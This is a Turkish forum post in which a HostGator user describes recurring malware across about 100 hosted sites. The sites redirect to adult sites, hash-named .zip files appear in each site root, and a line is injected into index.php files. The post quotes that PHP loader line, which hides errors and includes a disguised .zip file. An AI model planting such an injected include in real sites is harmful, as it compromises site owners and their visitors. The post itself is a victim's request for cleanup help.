Merhaba Arkadaşlar
Hostgatordan sınırsız domain eklemeli hosting paketi kullanıyorum. 100 Civarı domain de hostingde barınmakta. Kimisi öyle boş duruyor kimisi aktif siteler. Aktif siteler hepsi wordpress, öyle duran sitelerde sadece index.html var ( Bu alan adı satılık vs gibisinden )
Zaman zaman aynı anda tüm sitelerim başka sitelere yönleniyor. Wordpress olanda olmayan da. Aynı virüs tüm siteleri etkiliyor ve bu da genelde xxx siteler oluyor.
Bi ara .htaccess leri bozup ve yenileri üretip yönlendirmeydi onları temizlemek epey zamanımı aldı ve herşey aylardır normaldi.
Son 2 gündür de tüm sitelerin ana dizininde
"d730d81e7o133a51c2bddc5c68874ce.zip"
"4bb0a250f62548654e50c3d29c4b6096.zip"
isimli 2 tane dosya üretiyor ve "index.php" lere
"error_reporting(0);ini_set("display_errors", 0);$localpath=getenv("SCRIPT_NAME");$absolutepath= getenv("SCRIPT_FILENAME");$root_path=substr($absol utepath,0,strpos($absolutepath,$localpath));includ e_once($root_path."/d730d81e7o133a51c2bddc5c68874ce.zip"); ?>"
diye bir kod atıyor. Tüm klasörlerden bu 2 zip i siliyorum ve index.php lerden ilgili satırı siliyorum. Siteler normale dönüyor. FTP şifresini değiştiriyorum. Ama ertesi gün yine aynı virüs bulaşıyor.
Acaba nerelerde açık veriyor olabilirim? Fikri olan uzman arkadaşlar yardımcı olursa sevinirim